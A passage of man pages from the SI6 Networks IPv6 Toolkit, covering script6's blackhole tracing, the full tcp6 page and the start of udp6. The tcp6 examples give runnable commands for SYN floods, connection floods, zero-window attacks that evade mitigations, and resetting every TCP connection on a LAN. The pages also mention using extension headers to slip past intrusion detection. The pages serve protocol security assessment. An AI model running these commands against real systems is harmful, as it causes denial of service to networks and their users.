to the destination IPv6 address. * Packet drop rate by same AS: That is, the percentage of packet drops that occur at the same Autonomous System (AS) as that corresponding to the destination IPv6 address. * Delta\-Hops statistics: Statistics regarding the Delta-Hops at which the packet drops occur, with "delta\-hops" defined as "the number of hops from the intended destination". The get-trace-stats performs a number of sanity checks on the input data (i.e., the output from "script6 trace"). For example, if a line of input indicates that the last responding node for the non-EH-enabled path6 command is not the intended destination, this means that the destination is unreachable even when no IPv6 extension headers are employed, and hence the corresponding line will be discarded. \fBtrace DESTINATION [EHTYPE[EHSIZE]] [PROTOCOL [DESTPORT]]]\fR The trace command causes the script6 to read IPv6 addresses from standard input (typically piped from a file). For each IPv6 address, the script6 will try to isolate IPv6 blackholes resulting from employing IPv6 extension headers. By default, the probe packets (containing IPv6 Extension Headers) are IPv6 packets with a Destination Options Header of 8 bytes, encapsulating an ICMPv6 Echo Request message. However, this can be overridden by specifying the EHTYPE {DO,HBH,FH}, EHSIZE (an integer), PROTOCOL {tcp,udp,icmpv6}, and DESTPORT (a short integer) parameters. The "trace" command of the script6 tool internally employs the path6 tool of the toolkit as follows. Let us assume that we want to isolate an IPv6 blackhole on the path towards the destination system 2001:db8:d::1. Firstly, script6 will obtain the output of path6 towards such destination: .sp .RS 4 .nf 1. 2001:db8:1:1000::1 2. 2001:db8:2:2000::4 3. 2001:db8:2:4000::1 4. 2001:db8:3:4000::1 5. 2001:db8:3:1000::1 6. 2001:db8:4:4000::1 7. 2001:db8:4:1000::1 8. 2001:db8:5:5000::1 9. 2001:db8:5:6000::1 10. 2001:db8:d::1 .fi .RE Subsequently, script6 will obtain the output of EH-enabled path6 to the same destination: .sp .RS 4 .nf 1. 2001:db8:1:1000::1 2. 2001:db8:2:2000::4 3. 2001:db8:2:4000::1 4. 2001:db8:3:4000::1 5. 2001:db8:3:1000::1 6. 2001:db8:4:4000::1 .fi .RE For the sake of brevity, let us refer to the last\-responding node in the EH-enabled path6 ("2001:db8:4:4000::1" in this case) as "M". Assuming both packets in both path6 commands employ the same path, we will refer to "the node following the last responding node in the EH-enabled path6" ("2001:db8:4:1000::1" in our case), as "M+1", etc. Based on traceroute information above, which node is the one actually dropping the EH-enabled packets will depend on whether the dropping node filters packets on ingress or the egress. If the former, the dropping node will be M+1. If the latter, the dropping node will be "M". path6 assumes that nodes perform ingress-filtering. Thus, in our example above the last responding node to the EH-enabled traceroute ("M") is "2001:db8:4:4000::1", and therefore we assume the "node" dropping node to be "2001:db8:4:1000::1" ("M+1"). The resulting output will have the following syntax: .sp .RS 4 .nf DEST#LAST_NOEH#HOPS_NOEH#LAST_EH$HOPS_EH#DROPN#DROPN2 .fi .RE where: * DEST: Destination IPv6 address (as read from standard input). In our example above, this would be 2001:db8:d::1. * LAST_NOEH: Last responding IPv6 address for the path6 command with no IPv6 extension headers (this will be the same as DEST if there is a working path to the destination). In our example above, this would be 2001:db8:d::1. * HOPS_NOEH: Number of hops to LAST_NOEH. In our example above, this would be "10". * LAST_EH: Last responding IPv6 address in the EH\-enabled path6 command. In our example above, this would be 2001:db8:4:4000::1. * HOPS_EH: Number of hops to LAST_EH. In our example above, this would be "6". * DROPN: Dropping node (M+1 in our explanation above). In our example above, this would be 2001:db8:4:1000::1. * DROPN: Node after the dropping node (M+2). In our example, this would be 2001:db8:5:5000::1. The output of the "trace" command is meant to be processed by the get-trace-stats command of the script6 tool. Please check the blackhole6(1) tool for a more human-friendly tool for isolating IPv6 blackholes. .SH EXAMPLES The following sections illustrate typical use cases of the .B script6 tool. \fBExample #1\fR $ script6 get-asn 2001:db8::1 Obtain the Origin Autonomous System (AS) number for the IPv6 address 2001:db8::1. \fBExample #2\fR $ script6 get-as 2001:db8::1 Obtain information about the Origin Autonomous System (AS) of the IPv6 address 2001:db8::1. \fBExample #3\fR $ cat domains.txt | script6 get-aaaa > domains-aaaa.txt Map the domain names contained in the file "domains.txt" into AAAA records, and save the results in the file "domains-aaaa.txt". \fBExample #4\fR # cat domains-aaaa.txt | script6 trace do8 tcp port 25 > trace-results.txt Find IPv6 blackholes in the path to each of the IPv6 addresses contained in the file "domains-aaaa.txt" (one per line), and save the results to the file "trace-results.txt". The probe packets to be employed are IPv6 packets with a Destination Options header of 8 bytes, encapsulating a TCP segment with the Destinatio Port set to 25. \fBExample #5\fR $ cat trace-results.txt | script6 get-trace-stats Produce statistics based on the trace results from the file "trace-results.txt" (produced with "script6 trace"). .SH SEE ALSO .BR blackhole6 (1) .BR path6 (1) draft\-gont\-v6ops\-ipv6\-ehs\-in\-real-world (available at: .IR ) for a discussion of support of IPv6 Extension Headers in the public Internet. .SH AUTHOR The .B script6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2014\-2015 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/tcp6.1000066400000000000000000000573371254360455000170270ustar00rootroot00000000000000.TH TCP6 1 .SH NAME tcp6 \- A security assessment tool for TCP/IPv6 implementations .SH SYNOPSIS .B tcp6 \-i INTERFACE [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-A HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-c OPEN_TYPE] [\-C CLOSE_TYPE] [\-P PAYLOAD_SIZE] [\-o SRC_PORT] [\-a DST_PORT] [\-X TCP_FLAGS] [\-q TCP_SEQ] [\-Q TCP_ACK] [\-V TCP_URP] [\-w TCP_WIN] [\-W WINDOW_MODE] [\-M WIN_MOD_MODE] [\-Z DATA] [\-N] [\-n] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-F N_SOURCES] [\-T N_PORTS] [\-f] [\-R] [\-L] [\-l] [\-p PROBE_MODE] [\-z SECONDS] [\-r RATE] [\-v] [\-h] .SH DESCRIPTION .B tcp6 tool allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on TCP/IPv6 segments. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .B tcp6 can be employed to perform specific TCP connection-establishment and connection-termination sequences. For example, it can be employed to simulate a TCP "simultaneous open" scenario (see the "\-\-open\-mode" option) or to simulate a TCP "simultaneous close" scenario (see the "\-\-close\-mode" option). It can be employed to perform a number of resource-exhaustion attacks against TCP, such as SYN-flooding attacks, connection\-flooding attacks (see the "\-\-flood\-sources" and "\-\-flood\-ports" options), etc. Additionally, it can be employed to exploit attack vectors based on the TCP window (see the "\-\-window" option). .B tcp6 tool has two modes of operation: active and listening. In active mode, the tool attacks a specific target, while in listening mode the tool listens to TCP traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if an IPv6 Destination Address is specified. Listening mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters listening mode to respond incoming packets with TCP segments. .B tcp6 supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no TCP segments are sent in response). If any "accept filter" is specified, incoming packets must match the specified filters in order for the tool to respond with TCP segments. .SH OPTIONS .B tcp6 takes itS parameters as command\-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). If the tool is instructed to e.g. flood the victim with TCP segments from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. tcp6 supports IPv6 Extension Headers, including the IPv6 Fragmentation Header, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 extension headers are not employed by default, and must be explicitly enabled with the corresponding options. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. The network interface must be specified (i.e., the tool does not select any network interface "by default"). .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link-layer Source Address of the probe packets. If left unspecified, the link-layer Source Address of the packets is set to the real link-layer address of the network interface. Note: this option is meaningful only when the underlying link-layer technology is Ethernet. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link-layer Destination Address of the probe packets. By default, the link-layer Destination Address is automatically set to the link-layer address of the destination host (for on-link destinations) or to the link-layer address of the first-hop router. Note: this option is meaningful only when the underlying link-layer technology is Ethernet. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If the "\-F" ("\-\-flood\-sources") option is specified, this option includes an IPv6 prefix, from which random addresses are selected. See the description of the "\-F" option for further information on how the "\-s" option is processed in that specific case. Note: When operating in "listening" mode, the Source Address is automatically set to the Destination Address of the incoming packet. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (i.e., if the tool is to operate in "listening" mode). Note: When operating in "listening" mode, the Destination Address is automatically set to the Source Address of the incoming packet. .TP .BI \-A\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the IPv6 packets. It defaults to 255. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the outgoing packet(s). The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop-by-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-y\ FRAG_SIZE ,\ \-\-frag\-hdr\ FRAG_SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-P\ PAYLOAD_SIZE ,\ \-\-payload\-size\ PAYLOAD_SIZE This options specifies the size of the TCP payload. It defaults to 0 (i.e., empty TCP segments). .TP .BI \-o\ SRC_PORT ,\ \-\-src\-port\ SRC_PORT This option specifies the TCP Source Port. .TP .BI \-a\ DST_PORT ,\ \-\-dst\-port\ DST_PORT This option specifies the TCP/UDP Destination Port. .TP .BI \-X\ TCP_FLAGS ,\ \-\-tcp\-flags\ TCP_FLAGS his option is used to set specific the TCP flags. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If this option is not set, and the tool operates in listening mode, the flags of the generated TCP segments are automatically set as follows: TCP segments elicited by SYNs have both the SYN and ACK flags set. All other TCP segments have the ACK bit set. .TP .BI \-q\ SEQ_NUMBER ,\ \-\-tcp\-seq\ SEQ_NUMBER This option specifies the Sequence Number of the TCP header. If left unspecified, the Sequence Number is randomized. If this option is left unspecified and the tool is operating in listening mode, the TCP Sequence Number is set to the Acknowledgement Number of the packet that elicited the TCP segment. .TP .BI \-Q\ ACK_NUMBER ,\ \-\-tcp\-ack\ ACK_NUMBER This option specifies the Acknowledgment Number of the TCP segment. If left unspecified, the Acknowledgment Number is randomized. If this option is left unspecified and the tool is operating in listening mode, the TCP Sequence Number is set to the Acknowledgement Number of the packet that elicited the TCP segment. .TP .BI \-V\ URG_POINTER ,\ \-\-tcp\-urg\ URG_POINTER This option specifies the Urgent Pointer of the TCP segment. If left unspecified, the Urgent Pointer is set to 0. .TP .BI \-w\ TCP_WINDOW ,\ \-\-tcp\-win\ TCP_WINDOW This option specifies the value of the TCP Window. If left unspecified, the Window is randomized. .TP .BI \-W\ WIN_MODE ,\ \-\-window\-mode\ WIN_MODE This option specifies how to operate the TCP window by means of the WIN_MODE parameter. Two modes are supported: \+ closed \+ modulated When the "closed" mode is selected, the TCP window will be set to 0 (i.e., "closed window"). If the tool estabishes new TCP connections, the initial window advertised during the TCP three\-way handshake will be that specified with the '\-w' option. However, once the connection has been established, the TCP window will be set to 0. This allows for the implementation of the so\-called Netkill attack, discussed in Section 7.1.1 of the document "Security Assessment of the Transmission Control Protocol (TCP)" (available at: ). When the "modulated" mode is selected, the TCP window will oscillate between alternate between two different values. These values, along the amount of time that each of them is "active", can be specified by means of the '\-M' ("\-\-win-modulate") option. The first of the aforementioned values is meant to close the window (hence it will typically be zero), while the second is meant to open the window. The goal of alternating between these two values is to circumvent a trivial mitigation against Zero-Window attacks implemented by some stacks where they enforce a limit on the maximum amount of time that the TCP advertised by a remote peer remains fully\-closed (i.e., set to 0). By changing the advertised window to some other (small) value every now and then, such a trivial "counter-measure" can be easily circumvented. .TP .BI \-M\ WIN_MOD_MODE ,\ \-\-win\-modulation\ WIN_MOD_MODE This option specifies the two values (and their respective duration) over which the TCP window will alternate. The value WIN_MOD_MODE hast the syntax "WIN1:TIME1:WIN2:TIME2", where the WIN1 and WIN2 parameters specify the window size for each of these periods, while the TIME1 and TIME2 parameters specify their respective time lengths. For example, setting "\-\-win\-modulation 0:60:10:30" will cause .B tcp6 to alternate between advertising a TCP window of 0 bytes for 60 seconds, and advertising a TCP window of 10 bytes for 30 seconds. This option will be typically employed along with one of the flooding options ("\-\-flood\-sources" an/or "\-\-flood\-ports") and the "\-\-data" option, such that multiple TCP connections are established, and the target TCPs keep their retransmission buffer full. In this scenario, the TCP window "modulation" option can be leveraged to evade trivial counter-measures implemented by some TCP stacks that try to mitigate Zero-Window attacks by enforcing a limit on the maximum amount of time the TCP window can be in the "closed state". .TP .BI \-c\ OPEN_MODE ,\ \-\-open\-mode\ OPEN_MODE This option specifies the connection\-establishment mode. The following modes are available: \+ simultaneous \+ passive \+ abort When the "simultaneous" mode is selected, .B tcp6 will respond to incoming SYN segments with other SYN segments, thus simulating a "simultaneous open" scenario. When the "passive" mode is selected, .B tcp6 will respond to incoming SYN segments with the typical SYN/ACK segments, thus leading to the traditional "three\-way handshake". Finally, when the "abort" mode si selected, .B tcp6 wil respond to incoming SYN segments with RST segments, thus aborting the incoming connections. For the most part, this option is useful for assessing the correct behavior of TCP implementations (e.g., support for "simultaneous opens"). .TP .BI \-C\ CLOSE_MODE ,\ \-\-close\-mode\ CLOSE_MODE This option specifies the the connection-termination mode. The following modes are available: \+ simultaneous \+ passive \+ abort \+ active \+ FIN\-WAIT\-1 \+ FIN\-WAIT\-2 \+ LAST\-ACK When the "simultaneous" mode is selected, .B tcp6 will respond to incoming FIN segments with FIN segments, thus simulating a "simultaneous close" scenario. When the "passive" mode is selected, .B tcp6 will respond to incoming FIN segments with the typical FIN/ACK segments, thus leading to the traditional TCP connection-termination sequence. When the "abort" mode is selected, .B tcp6 wil respond to incoming FIN segments with RST segments, thus aborting the corresponding connections. When the "active" mode is selected, .B tcp6 will start the connection\-termination sequence by sending a FIN segment. The FIN\-WAIT\-1, FIN\-WAIT\-2, and LAST\-ACK modes will result in connections in the FIN\-WAIT\-1, FIN\-WAIT\-2, and LAST\-ACK, respectively. It should be noted that in order for the remote TCPs to transition to the FIN\-WAIT\-1 or FIN\-WAIT\-2 states, the remote TCPs must perform the "active close". This can be trivially triggered for application protocols such as HTTP, but might not be feasible for other protocols. .TP .BI \-Z\ DATA ,\ \-\-data\ DATA This option is used to specify a payload that should be sent as the first data segment once a TCP connection has been established. It will typically include an application-layer request. Note: the string used for the DATA parameter can contain the "\\r" and "\\n" C\-style escape senquenced for representing "carriage return" and "line feed" (respectively). As an example, this option could be employed to send an HTTP request if set as '\-\-data "GET / HTTP/1.0\\r\\n\\r\\n"'. .TP .BR \-N\| ,\ \-\-not\-ack\-data This option instructs .B tcp6 not to acknowledge the TCP payload of incoming segments (when operating in listening mode). Note: By default, tcp6 will acknowledge both the payload and the flags of the incoming TCP segments. .TP .BR \-n\| ,\ \-\-not\-ack\-flags This option instructs tcp6 not to acknowledge the TCP flags (SYN and/or FIN) of incoming segments (when operating in listening mode). Note: By default, tcp6 will acknowledge both the payload and the flags of the incoming TCP segments. .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ LINK_ADDR ,\ \-\-block\-link\-src\ LINK_ADDR This option sets a block filter for the incoming packets, based on their link-layer Source Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-K\ LINK_ADDR ,\ \-\-block\-link\-dst\ LINK_ADDR This option sets a block filter for the incoming packets, based on their link-layer Destination Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ LINK_ADDR ,\ \-\-accept\-link\-src\ LINK_ADDR This option sets an accept filter for the incoming packets, based on their link-layer Source Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-G\ LINK_ADDR ,\ \-\-accept\-link\-dst\ LINK_ADDR This option sets an accept filter for the incoming packets, based on their link-layer Destination Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-F\ N_SOURCES ,\ \-\-flood\-sources\ N_SOURCES This option instructs the tool to send multiple TCP segments with different Source Addresses. The number of different source addresses is specified as "\-F number". The Source Address of each TCP segment is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix ::/0. .TP .BI \-T\ N_PORTS ,\ \-\-flood\-ports\ N_PORTS This option instructs the tool to send multiple TCP segments with different Source Ports. The Source Port of each TCP segment is randomly selected from the whole port number space (0\-65535). .TP .BR \-l\| ,\ \-\-loop This option instructs the tcp6 tool to send periodic TCP segments to the victim node. The amount of time to pause between sending TCP segments can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP .BR \-z\| ,\ \-\-sleep This option specifies the amount of time to pause between sending TCP segments (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP .BI \-r\ RATE ,\ \-\-rate\-limit\ RATE This option specifies the rate limit to use when performing a remote address scan. "RATE" should be specified as "xbps" or "xpps" (with "x" being an unsigned integer), for rate-limits in bits per second or packets per second, respectively. .TP .BR \-L\| ,\ \-\-listen This instructs the tcp6 tool to operate in listening mode (possibly after attacking a given node). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP .BI \-p\ PROBE_MODE ,\ \-\-probe\-mode\ PROBE_MODE This option instructs tcp6 to operate in probe mode. The specific probe mode is specified as an argument to this option (currently, only "script" mode is supported). In probe mode, .B tcp6 sends probe segments, and waits for response packets. The response packets are decoded based on the selected probe mode. In the "script" probe mode, the tool decodes TCP segments as follows: RESPONSE:RESPONSE_TYPE:RESPONSE_DECODE... Where the string RESPONSE is fixed, and RESPONSE_TYPE indicates the response received. As of this version of the tool, the following RESPONSE_TYPE values are supported: \+ TCP6: Indicates that the tool received a TCP/IPv6 packet \+ TIMEOUT: Indicates that the tool received no response If RESPONSE_TYPE is TCP6, RESPONSE code contains the TCP flags set in the receive TCP segment. The TCP flags are encoded as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), and "U" (URG). Possibe output lines of the tool are: RESPONSE:TIMEOUT: RESPONSE:TCP6:RA: Note: Future versions of the tool will also decode ICMPv6 error messages, and will include additional data regarding the incoming TCP segments (e.g., ACK value, payload size, etc.). .TP .BR \-v\| ,\ \-\-verbose This option instructs the tcp6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP .BR \-h\| ,\ \-\-help Print help information for the .B tcp6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B tcp6 tool. \fBExample #1\fR # tcp6 \-s fc00:1::/64 \-d fc00:1::1 \-a 22 \-X S \-F 100 \-l \-z 1 \-v In this example the .B tcp6 tool is essentially employed to perform a SYN-flood attack against port number 22 of the host fc00:1::1. The tool uses the network interface "eth0" (as specified by the "\-i" option), and sends SYN segments (as specified by the "\-X" option) from the prefix fc00:1::/64 (as specified by the "\-s" option) to port 22 (specified by the "\-a" option) at the destination address fc00:1::1 (specified by the "\-d" option). The tool sends TCP segments from 100 different addresses (as specified by the "\-F" option) every one second (as specified by the "\-l" and "\-z" options). The tool will be verbose (as specified by the "\-v" option). \fBExample #2\fR # tcp6 \-i eth0 \-L \-X RA \-v In this example, the .B tcp6 tool is employed to perform a TCP connection-reset attack against all active TCP connections in the local network. The tool listens ("\-L") on the interface eth0 ("\-i eth0"), and responds to any TCP segments with a RST packet (with both the RST and ACK bits set). The tool will be verbose. \fBExample #3\fR # tcp6 \-i eth0 \-d fc00:1::1 \-a 80 \-L \-s fc00:1::/112 \-l \-r 1pps \-v \-\-data "GET / HTTP/1.0\\r\\n\\r\\n" \-\-close\-mode last\-ack \-\-flood\-ports 10 Flood the target system (fc00:1::1) with connections that stay in the LAST\-ACK state (on port 80), sending packets at a rate of one packet per second. For each forged address, 10 different (forged) ports are used. For each connection, .B tcp6 will send an HTTP application request. \fBExample #4\fR # tcp6 \-i eth0 \-d fc00:1::1 \-a 80 \-L \-s fc00:1::/112 \-l \-r 1000pps \-\-tcp\-flags auto \-v \-\-data "GET / HTTP/1.0\\r\\n\\r\\n" \-\-flood\-ports 10 \-\-window\-mode close Flood the target node (fc00:1::1) with TCP connections (on port 80). On each connection that is established, an HTTP request is sent, and the TCP window is immediately closed. For each forged IPv6 source address ten different TCP source ports are randomized. The bandwidth of the attack is limited to 1000 pps. \fBExample #5\fR # tcp6 \-d fc00:1::1 \-a 80 \-\-tcp\-flags A \-\-dst-opt-hdr 8 \-\-payload\-size 50 \-\-probe\-mode script Send a probe TCP segment to TCP port 80 at fc00:1::1. The probe packet consists of an IPv6 packet with a Destination Options header of 8 bytes, and an IPv6 payload consisting of a TCP segment with the ACK bit set, and 50 data bytes. The probe mode is "script". .SH SEE ALSO "Security Assessment of the Transmission Control Protocol (TCP)" (available at: ) for a discussion of TCP vulnerabilities. .SH AUTHOR The .B tcp6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/udp6.1000066400000000000000000000357651254360455000170320ustar00rootroot00000000000000.TH UDP6 1 .SH NAME udp6 \- A security assessment tool for UDP/IPv6 implementations .SH SYNOPSIS .B udp6 \-i INTERFACE [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-A HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-P PAYLOAD_SIZE] [\-o SRC_PORT] [\-a DST_PORT] [\-Z DATA] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-F N_SOURCES] [\-T N_PORTS] [\-L] [\-l] [\-p PROBE_MODE] [\-z SECONDS] [\-r RATE] [\-v] [\-h] .SH DESCRIPTION .B udp6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on UDP/IPv6 datagrams. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment and troubleshooting toolkit for the IPv6 protocols. .B udp6 tool has two modes of operation: active and listening. In active mode, the tool attacks a specific target, while in listening mode the tool listens to UDP traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if an IPv6 Destination Address is specified. Listening mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters listening mode to respond incoming packets with UDP datagrams. .B udp6 supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no UDP datagrams are sent in response). If any "accept filter" is specified, incoming packets must match the specified filters in order for the tool to respond with UDP datagrams. .SH OPTIONS .B udp6 takes itS parameters as command\-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). If the tool is instructed to e.g. flood the victim with UDP datagrams from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. udp6 supports IPv6 Extension Headers, including the IPv6 Fragmentation Header, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 extension headers are not employed by default, and must be explicitly enabled with the corresponding options. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. The network interface must be specified (i.e., the tool does not select any network interface "by default"). .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link-layer Source Address of the probe packets. If left unspecified, the link-layer Source Address of the packets is set to the real link-layer address of the network interface. Note: this option is meaningful only when the underlying link-layer technology is Ethernet. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link-layer Destination Address of the probe packets. By default, the link-layer Destination Address is automatically set to the link-layer address of the destination host (for on-link destinations) or to the link-layer address of the first-hop router. Note: this option is meaningful only when the underlying link-layer technology is Ethernet. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If the "\-F" ("\-\-flood\-sources") option is specified, this option includes an IPv6 prefix, from which random addresses are selected. See the description of the "\-F" option for further information on how the "\-s" option is processed in that specific case. Note: When operating in "listening" mode, the Source Address is automatically set to the Destination Address of the incoming packet. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (i.e., if the tool is to operate in "listening" mode). Note: When operating in "listening" mode, the Destination Address is automatically set to the Source Address of the incoming packet. .TP .BI \-A\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the IPv6 packets. It defaults to 255. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the outgoing packet(s). The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop-by-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-y\ FRAG_SIZE ,\ \-\-frag\-hdr\ FRAG_SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-P\ PAYLOAD_SIZE ,\ \-\-payload\-size\ PAYLOAD_SIZE This options specifies the size of the UDP payload. It defaults to 0 (i.e., empty UDP datagrams). .TP .BI \-o\ SRC_PORT ,\ \-\-src\-port\ SRC_PORT This option specifies the UDP Source Port. .TP .BI \-a\ DST_PORT ,\ \-\-dst\-port\ DST_PORT This option specifies the UDP Destination Port. .TP 